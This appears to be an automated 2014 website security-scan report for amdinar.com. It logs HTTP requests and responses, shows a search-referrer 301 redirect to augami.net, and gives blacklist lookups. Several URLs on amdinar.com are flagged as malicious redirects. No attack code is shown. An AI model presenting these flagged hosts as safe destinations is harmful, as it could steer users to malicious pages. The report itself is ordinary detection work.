Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://amdinar.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: amdinar.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 12 Jun 2014 13:09:12 GMT Location: http://augami.net/5782fh2.html Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://amdinar.com/ | 200 OK Content-Length: 7454 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
https://count.carrierzone.com/app/count_server/count_piwik.js | 200 OK Content-Length: 34984 Content-Type: text/javascript | clean |
http://amdinar.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Jun 2014 13:09:16 GMT Location: http://augami.net/5782fh2.html Server: Apache Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://augami.net/5782fh2.html | 200 OK Content-Length: 8178 Content-Type: text/html | clean |
http://d1vbm0eveofcle.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/x-javascript | clean |
http://d1vbm0eveofcle.cloudfront.net/scripts/tier2caf.js | 200 OK Content-Length: 25583 Content-Type: application/x-javascript | clean |
http://amdinar.com/scripts/feedmeCaf.php?q=&ip=78.158.11.226&max=10&hl=lt&d=augami.net&ron=0&adult=0 | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Jun 2014 13:09:18 GMT Location: http://augami.net/5782fh2.html Server: Apache Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://augami.net/test404page.js | 400 Bad Request Content-Length: 20 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amdinar.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://amdinar.com/
Result: amdinar.com is not infected or malware details are not published yet.